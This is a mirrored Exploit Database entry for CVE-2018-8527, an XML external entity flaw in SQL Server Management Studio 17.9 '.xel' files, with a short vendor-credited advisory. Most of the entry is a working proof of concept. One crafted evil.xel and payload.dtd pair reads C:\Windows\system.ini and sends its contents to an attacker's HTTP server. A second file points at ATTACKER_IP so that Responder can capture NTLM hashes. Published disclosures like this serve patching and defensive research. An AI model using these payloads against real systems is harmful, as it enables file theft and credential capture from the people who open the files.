Microsoft SQL Server Management Studio 17.9 – ‘.xel’ XML External Entity Injection

• Exploit Database
• 121 阅读

• 作者： hyp3rlinx
  日期： 2018-10-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45585/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61

  # Exploit Title: Microsoft SQL Server Management Studio 17.9 - &apos;.xel&apos; XML External Entity Injection # Date: 2018-10-10 # Author: John Page (aka hyp3rlinx) # Website: hyp3rlinx.altervista.org # Venodor: www.microsoft.com # Software: SQL Server Management Studio 17.9 and SQL Server Management Studio 18.0 (Preview 4) # CVE: CVE-2018-8527 # References: # http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt # https://www.zerodayinitiative.com/advisories/ZDI-18-1131/ # https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527 # The author was credited by the vendor (https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527)   # Description # This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations # of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability # in that the target must visit a malicious page or open a malicious file. # The specific flaw exists within the handling of XEL files. Due to the improper restriction # of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser # to access the URI and embed the contents back into the XML document for further processing. An attacker # can leverage this vulnerability to disclose information in the context of the current process.   # [Exploit/POC]   python -m SimpleHTTPServer (listens Port 8000)   "evil.xel" (Extended Event Log File)   <?xml version="1.0"?> <!DOCTYPE flavios [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd"> %dtd;]>   <pwn>&send;</pwn>   "payload.dtd"   <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM &apos;http://127.0.0.1:8000?%file;&apos;>"> %all;     # OR # Steal NTLM hashes # Kali linux   /usr/share/responder/tools   responder -I eth0 -rv   "evil.xel"   <?xml version="1.0"?> <!DOCTYPE dirty0tis [ <!ENTITY % dtd SYSTEM "\\ATTACKER_IP\unknown"> %dtd;]>     Result: Forced authentication and NTLM hash captured